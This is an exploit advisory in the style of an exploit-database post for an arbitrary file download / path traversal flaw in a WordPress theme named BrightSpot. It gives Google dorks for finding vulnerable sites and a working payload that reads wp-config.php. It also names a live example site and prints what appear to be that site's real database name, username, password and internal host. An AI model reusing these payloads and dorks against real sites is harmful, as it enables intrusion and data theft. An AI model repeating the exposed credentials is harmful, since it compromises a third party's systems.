WordPress 4.8 BrightSpot Themes Arbitrary File Download

############################################################################################

# Exploit Title : WordPress 4.8 BrightSpot Themes Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/03/2019
# Vendor Homepage : brightspotfundraising.co.uk ~ wordpress.org
# Software Information Link : brightspotfundraising.co.uk/blog/
# Software Affected Versions : 4.7/4.8
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/themes/brightspot/"
intext:Copyright 2019 © Bright Spot | Rob Woods
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Impact :
***********
* WordPress 4.8 BrightSpot Themes is prone to a vulnerability that lets attackers download arbitrary files because the application

fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the

web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure

of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal

vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not

properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

############################################################################################

# Vulnerable File :
******************
/download.php

# Vulnerable Parameter :
**********************
?download_file=

# Arbitrary File Download Exploit :
*******************************
/wp-content/themes/brightspot/download.php?download_file=[FILENAME]

/wp-content/themes/brightspot/download.php?download_file=../../../wp-config.php

# Information About MySQL Configuration File :
******************************************
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', '');

/** MySQL database username */
define('DB_USER', '');

/** MySQL database password */
define('DB_PASSWORD', ');

/** MySQL hostname */
define('DB_HOST', '');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', '');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

############################################################################################

# Example Vulnerable Sites :
*************************
[+] brightspotfundraising.co.uk/wp-content/themes/brightspot/download.php?download_file=../../../wp-config.php

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'brightsp730_q9pm');

/** MySQL database username */
define('DB_USER', 'brightsp730_q9pm');

/** MySQL database password */
define('DB_PASSWORD', 'eroolwpp2st31zni');

/** MySQL hostname */
define('DB_HOST', '10.169.0.164');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################